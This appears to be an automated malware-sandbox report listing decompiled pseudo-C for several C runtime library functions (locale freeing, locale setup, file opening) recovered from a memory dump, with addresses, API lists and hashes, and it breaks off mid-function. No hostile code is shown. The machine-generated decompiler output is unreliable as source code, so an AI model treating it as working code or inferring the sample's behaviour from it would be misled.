										E6E20FBB2( *((intOrPtr*)(_t216 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t216 + 0x8c)) = _t143;
								 *_t216 = _v60;
								 *(_t216 + 0x90) = _v32;
								 *(_t216 + 0x94) = _v68;
								 *(_t216 + 0x98) = _v56;
								 *(_t216 + 4) = _v48;
								L37:
								E6E20FBB2(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t217 =  *(_t189 - 1) & 0x000000ff;
									if(_t217 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t210 = _t193 + 0x100 + _t217 * 2;
									do {
										_t217 = _t217 + 1;
										 *_t210 = 0x8000;
										_t210 = _t210 + 2;
									} while (_t217 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t195 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t195 <= _t166) {
									 *((char*)(_t195 + _t198)) = 0x20;
									_t195 = _t195 + 1;
									__eflags = _t195;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t243 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_push(_t106);
				_push(0x1004);
				_push(_t172);
				_push(0);
				_push( &_v76);
				_t168 = E6E215ACA(0, __edx, __edi, _t212);
				_t220 = _t219 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}





















































    0x6e20b76f
    0x6e20b776
    0x6e20b77b
    0x6e20b77e
    0x6e20b781
    0x6e20b784
    0x6e20b787
    0x6e20b78d
    0x6e20b790
    0x6e20b793
    0x6e20b796
    0x6e20b799
    0x6e20b79e
    0x6e20babe
    0x6e20bac0
    0x6e20bac2
    0x6e20bac2
    0x6e20bac5
    0x6e20bacb
    0x6e20bacd
    0x6e20bad3
    0x6e20bad9
    0x6e20bae3
    0x6e20baed
    0x6e20baf4
    0x6e20bb04
    0x6e20bb04
    0x6e20b7a4
    0x6e20b7a7
    0x6e20b7ac
    0x6e20b7ca
    0x6e20b7d4
    0x6e20b7d7
    0x6e20b7ea
    0x6e20b7ed
    0x6e20b7fb
    0x6e20b7fe
    0x6e20b80c
    0x6e20b80f
    0x6e20b820
    0x6e20b823
    0x6e20b826
    0x6e20b82b
    0x6e20b831
    0x6e20ba85
    0x6e20ba88
    0x6e20ba90
    0x6e20ba98
    0x6e20baa0
    0x6e20baaa
    0x6e20baaa
    0x00000000
    0x6e20b85a
    0x6e20b85a
    0x6e20b85c
    0x6e20b85c
    0x6e20b85f
    0x6e20b860
    0x6e20b876
    0x00000000
    0x00000000
    0x6e20b87c
    0x6e20b87f
    0x6e20b882
    0x00000000
    0x00000000
    0x6e20b88f
    0x6e20b892
    0x6e20b8b2
    0x6e20b8b7
    0x6e20b8ba
    0x6e20b8bc
    0x00000000
    0x00000000
    0x6e20b8d6
    0x6e20b8e6
    0x6e20b8eb
    0x6e20b8f0
    0x00000000
    0x00000000
    0x6e20b8fa
    0x6e20b927
    0x6e20b93d
    0x6e20b940
    0x6e20b945
    0x6e20b94a
    0x00000000
    0x00000000
    0x6e20b950
    0x6e20b955
    0x6e20b95b
    0x6e20b95e
    0x6e20b961
    0x6e20b964
    0x6e20b967
    0x6e20b96a
    0x6e20b971
    0x6e20b974
    0x6e20b977
    0x6e20b979
    0x6e20b97f
    0x6e20b982
    0x6e20b984
    0x6e20b9c6
    0x6e20b9c8
    0x6e20b9d1
    0x6e20b9d6
    0x6e20b9d9
    0x6e20b9e3
    0x6e20b9e5
    0x6e20b9e8
    0x6e20b9ea
    0x6e20b9f3
    0x6e20b9f5
    0x6e20b9f7
    0x6e20b9f8
    0x6e20ba03
    0x6e20ba08
    0x6e20ba0c
    0x6e20ba1a
    0x6e20ba2d
    0x6e20ba3b
    0x6e20ba46
    0x6e20ba4b
    0x6e20ba0c
    0x6e20ba4e
    0x6e20ba51
    0x6e20ba57
    0x6e20ba60
    0x6e20ba65
    0x6e20ba6e
    0x6e20ba77
    0x6e20ba80
    0x6e20baab
    0x6e20baae
    0x00000000
    0x6e20b98b
    0x6e20b98b
    0x6e20b98e
    0x6e20b98e
    0x6e20b992
    0x00000000
    0x00000000
    0x6e20b994
    0x6e20b99d
    0x6e20b9bb
    0x6e20b9bb
    0x6e20b9c1
    0x00000000
    0x00000000
    0x00000000
    0x6e20b9c1
    0x6e20b9a5
    0x6e20b9a8
    0x6e20b9ad
    0x6e20b9ae
    0x6e20b9b1
    0x6e20b9b7
    0x00000000
    0x6e20b9a8
    0x00000000
    0x6e20b9c3
    0x6e20b901
    0x6e20b901
    0x6e20b904
    0x6e20b904
    0x6e20b908
    0x00000000
    0x00000000
    0x6e20b90a
    0x6e20b90e
    0x6e20b91b
    0x6e20b913
    0x6e20b917
    0x6e20b917
    0x6e20b918
    0x6e20b918
    0x6e20b91f
    0x6e20b922
    0x6e20b925
    0x00000000
    0x00000000
    0x00000000
    0x6e20b925
    0x00000000
    0x6e20b904
    0x6e20b8fa
    0x6e20b831
    0x6e20b7ae
    0x6e20b7af
    0x6e20b7b4
    0x6e20b7b8
    0x6e20b7b9
    0x6e20b7ba
    0x6e20b7bf
    0x6e20b7c4
    0x00000000
    0x00000000
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$Info
    • String ID: p#n
    • API String ID: 2509303402-2354115805
    • Opcode ID: 7ba88f5653b22c1c7cdd25423d0275cea26ace6b1c3bc8248006c4fa76cc075e
    • Instruction ID: 8ce4d72b8ca0300830dff8805947cd1da0b12749468a7d35cff424930005adc9
    • Opcode Fuzzy Hash: 7ba88f5653b22c1c7cdd25423d0275cea26ace6b1c3bc8248006c4fa76cc075e
    • Instruction Fuzzy Hash: A8B19E71D0020A9FEF21CFE8C890BEEBBFABF08305F144469E995A7681D77598458F60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21979C, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E21979C(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t2 = _t74 + 0x88; // 0xb000a12f
				_t25 =  *_t2;
				if(_t25 != 0 && _t25 != 0x6e24b1a8) {
					_t3 = _t74 + 0x7c; // 0xb0d80d89
					_t45 =  *_t3;
					if(_t45 != 0 &&  *_t45 == 0) {
						_t4 = _t74 + 0x84; // 0x6e24b0d0
						_t46 =  *_t4;
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E20FBB2(_t46);
							_t5 = _t74 + 0x88; // 0xb000a12f
							E6E21AF90( *_t5);
						}
						_t6 = _t74 + 0x80; // 0x156b6e24
						_t47 =  *_t6;
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E20FBB2(_t47);
							_t7 = _t74 + 0x88; // 0xb000a12f
							E6E21B44A( *_t7);
						}
						_t8 = _t74 + 0x7c; // 0xb0d80d89
						E6E20FBB2( *_t8);
						_t9 = _t74 + 0x88; // 0xb000a12f
						E6E20FBB2( *_t9);
					}
				}
				_t10 = _t74 + 0x8c; // 0xc22b6e24
				_t26 =  *_t10;
				if(_t26 != 0 &&  *_t26 == 0) {
					_t11 = _t74 + 0x90; // 0x24b0d8a3
					E6E20FBB2( *_t11 - 0xfe);
					_t12 = _t74 + 0x94; // 0xd00d8b6e
					E6E20FBB2( *_t12 - 0x80);
					_t13 = _t74 + 0x98; // 0x836e24b0
					E6E20FBB2( *_t13 - 0x80);
					_t14 = _t74 + 0x8c; // 0xc22b6e24
					E6E20FBB2( *_t14);
				}
				_t15 = _t74 + 0x9c; // 0xd2b48e9
				E6E21990F( *_t15);
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x6e1f7464
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x6e1f73ec
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e24b3a0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E20FBB2(_t31);
							E6E20FBB2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfc4d8be8
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E20FBB2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E20FBB2(_t74);
			}















    0x6e2197a4
    0x6e2197a8
    0x6e2197a8
    0x6e2197b0
    0x6e2197b9
    0x6e2197b9
    0x6e2197be
    0x6e2197c5
    0x6e2197c5
    0x6e2197cd
    0x6e2197d5
    0x6e2197da
    0x6e2197e0
    0x6e2197e6
    0x6e2197e7
    0x6e2197e7
    0x6e2197ef
    0x6e2197f7
    0x6e2197fc
    0x6e219802
    0x6e219808
    0x6e219809
    0x6e21980c
    0x6e219811
    0x6e219817
    0x6e21981d
    0x6e2197be
    0x6e21981e
    0x6e21981e
    0x6e219826
    0x6e21982d
    0x6e219839
    0x6e21983e
    0x6e21984c
    0x6e219851
    0x6e21985a
    0x6e21985f
    0x6e219865
    0x6e21986a
    0x6e21986d
    0x6e219873
    0x6e21987b
    0x6e21987c
    0x6e21987c
    0x6e219882
    0x6e219885
    0x6e219885
    0x6e219888
    0x6e21988f
    0x6e219891
    0x6e219895
    0x6e21989d
    0x6e2198a4
    0x6e2198aa
    0x6e2198ab
    0x6e2198ab
    0x6e2198b2
    0x6e2198b4
    0x6e2198b4
    0x6e2198b9
    0x6e2198c1
    0x6e2198c6
    0x6e2198c7
    0x6e2198c7
    0x6e2198ca
    0x6e2198cd
    0x6e2198d0
    0x6e2198d3
    0x6e2198d3
    0x6e2198e5

    APIs
    • ___free_lconv_mon.LIBCMT ref: 6E2197E0
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFAD
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFBF
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFD1
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFE3
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFF5
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B007
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B019
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B02B
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B03D
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B04F
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B061
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B073
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B085
    • _free.LIBCMT ref: 6E2197D5
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E2197F7
    • _free.LIBCMT ref: 6E21980C
    • _free.LIBCMT ref: 6E219817
    • _free.LIBCMT ref: 6E219839
    • _free.LIBCMT ref: 6E21984C
    • _free.LIBCMT ref: 6E21985A
    • _free.LIBCMT ref: 6E219865
    • _free.LIBCMT ref: 6E21989D
    • _free.LIBCMT ref: 6E2198A4
    • _free.LIBCMT ref: 6E2198C1
    • _free.LIBCMT ref: 6E2198D9
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 95f88ae175ae0597ed2c29667f67ecf44a5f7799016ea6fb17450b64d23a88c9
    • Instruction ID: 39eafc4afae1f6375e3965c4e19f1a7da22d1737117fab2d62eb2a2cd0e60b99
    • Opcode Fuzzy Hash: 95f88ae175ae0597ed2c29667f67ecf44a5f7799016ea6fb17450b64d23a88c9
    • Instruction Fuzzy Hash: 7731923250830E9FEB618EB8D850BD6B3FEEF04315F218869E559D7190DF71AA90CB24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21B08E, Relevance: 18.4, APIs: 12, Instructions: 376COMMON
    Download Yara Rule
    C-Code - Quality: 81%
    			E6E21B08E(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				intOrPtr _t233;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E6E20FB55(0, 1, 0x50);
					_v8 = _t234;
					E6E20FBB2(0);
					if(_t234 != 0) {
						_t227 = E6E20FB55(0, 1, 4);
						_v12 = _t227;
						E6E20FBB2(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x6e24b1a8, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E6E20FB55(0, 1, 4);
							_v16 = _t232;
							E6E20FBB2(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E6E215ACA(_t210, _t224, _t233, _t234);
								_t238 = _t237 | E6E215ACA(_t210, _t224, _t233, _t237,  &_v28, 1, _t233, 0x14, _v8 + 0x10,  &_v28);
								_t239 = _t238 | E6E215ACA(_t210, _t224, _t233, _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14, 1);
								_t240 = _t239 | E6E215ACA(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18, _t233);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E6E215ACA(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c, 0x15);
								_t242 = _t241 | E6E215ACA(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20, _t14);
								_t243 = _t242 | E6E215ACA(_t210, _t224, _t233, _t242);
								_t244 = _t243 | E6E215ACA(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28,  &_v28);
								_t245 = _t244 | E6E215ACA(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29, 1);
								_t246 = _t245 | E6E215ACA(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a, _t233);
								_t247 = _t246 | E6E215ACA(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b, 0x51);
								_t248 = _t247 | E6E215ACA(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t249 = _t248 | E6E215ACA(_t210, _t224, _t233, _t248);
								_t250 = _t249 | E6E215ACA(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e,  &_v28);
								_t251 = _t250 | E6E215ACA(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f, 0);
								_t252 = _t251 | E6E215ACA(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38, _t233);
								_t253 = _t252 | E6E215ACA(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c, 0x57);
								_t254 = _t253 | E6E215ACA(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t233);
								_t255 = _t254 | E6E215ACA(_t210, _t224, _t233, _t254);
								_t256 = _t255 | E6E215ACA(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48,  &_v28);
								if((E6E215ACA(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c, 2) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E6E21AF90(_v8);
								E6E20FBB2(_v8);
								E6E20FBB2(_v12);
								E6E20FBB2(_v16);
								goto L4;
							}
							E6E20FBB2(_t234);
							E6E20FBB2(_v12);
							L7:
							goto L4;
						}
						E6E20FBB2(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x6e24b1a8;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E6E20FBB2( *(_t210 + 0x88));
							E6E20FBB2( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}













































    0x6e21b08e
    0x6e21b097
    0x6e21b09e
    0x6e21b0a1
    0x6e21b0a4
    0x6e21b0ad
    0x6e21b0cf
    0x6e21b0d3
    0x6e21b0d6
    0x6e21b0e0
    0x6e21b0f3
    0x6e21b0f7
    0x6e21b0fa
    0x6e21b104
    0x6e21b116
    0x6e21b3ac
    0x6e21b3ad
    0x6e21b3af
    0x6e21b3b7
    0x6e21b3bb
    0x6e21b3c0
    0x6e21b3cb
    0x6e21b3d7
    0x6e21b3e3
    0x6e21b3ef
    0x6e21b3f5
    0x6e21b3f9
    0x6e21b3fb
    0x6e21b3fb
    0x00000000
    0x6e21b3f9
    0x6e21b125
    0x6e21b129
    0x6e21b12c
    0x6e21b136
    0x6e21b14a
    0x6e21b150
    0x6e21b165
    0x6e21b179
    0x6e21b190
    0x6e21b1aa
    0x6e21b1b2
    0x6e21b1c4
    0x6e21b1db
    0x6e21b1f2
    0x6e21b20c
    0x6e21b223
    0x6e21b23a
    0x6e21b251
    0x6e21b26b
    0x6e21b282
    0x6e21b299
    0x6e21b2b0
    0x6e21b2ca
    0x6e21b2e1
    0x6e21b2f8
    0x6e21b300
    0x6e21b301
    0x6e21b303
    0x6e21b30f
    0x6e21b329
    0x6e21b345
    0x6e21b373
    0x6e21b386
    0x6e21b377
    0x6e21b37b
    0x6e21b38f
    0x00000000
    0x00000000
    0x6e21b391
    0x6e21b393
    0x6e21b396
    0x6e21b398
    0x6e21b39b
    0x6e21b381
    0x6e21b383
    0x6e21b385
    0x6e21b385
    0x6e21b385
    0x6e21b37b
    0x00000000
    0x6e21b38b
    0x6e21b34b
    0x6e21b351
    0x6e21b35a
    0x6e21b363
    0x00000000
    0x6e21b368
    0x6e21b139
    0x6e21b142
    0x6e21b10c
    0x00000000
    0x6e21b10c
    0x6e21b107
    0x00000000
    0x6e21b107
    0x6e21b0e2
    0x00000000
    0x6e21b0b7
    0x6e21b0b7
    0x6e21b0b9
    0x6e21b0bc
    0x6e21b3fd
    0x6e21b3fd
    0x6e21b405
    0x6e21b407
    0x6e21b407
    0x6e21b40f
    0x6e21b414
    0x6e21b418
    0x6e21b420
    0x6e21b428
    0x6e21b42e
    0x6e21b418
    0x6e21b432
    0x6e21b437
    0x6e21b43d
    0x00000000
    0x6e21b43d

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 0dccd3f1d9e093531291034565b4383a3893cc4e2bed6e1ce44bef3a807e749d
    • Instruction ID: f60c8520084664ca4df4fdd7b15c4cb1b660cc2c898f36a92145888b34d700ac
    • Opcode Fuzzy Hash: 0dccd3f1d9e093531291034565b4383a3893cc4e2bed6e1ce44bef3a807e749d
    • Instruction Fuzzy Hash: 15C14676E8420DAFDB20CBE8CC91FEE77FDAB09704F144555FA04EB285D6B09A418B64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20B102, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
    Download Yara Rule
    C-Code - Quality: 43%
    			E6E20B102(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				void* _t240;
				signed char _t243;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t240 = __edx;
				_t263 = E6E20AE5A(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t263, _t192 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t192 + _t192;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E6E213FAB(0, _t240, _t249, _t264, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t197 = 0;
						_t253 = E6E20ADC5();
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E6E213EF4(_t197,  *_t190, _t253);
								_t243 = _v5 | 0x00000001;
								_v5 = _t243;
								_v48 = _t243;
								 *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x6e2e36b0 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t279,  &_v48, _t206 << 2);
									_t134 = E6E20AB78(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t281 = _t279 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x6e2e36b0 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x6e2e36b0 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t267 = _v44;
										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
										if((_t267 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t267 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
											_t246 = E6E20ADC5();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
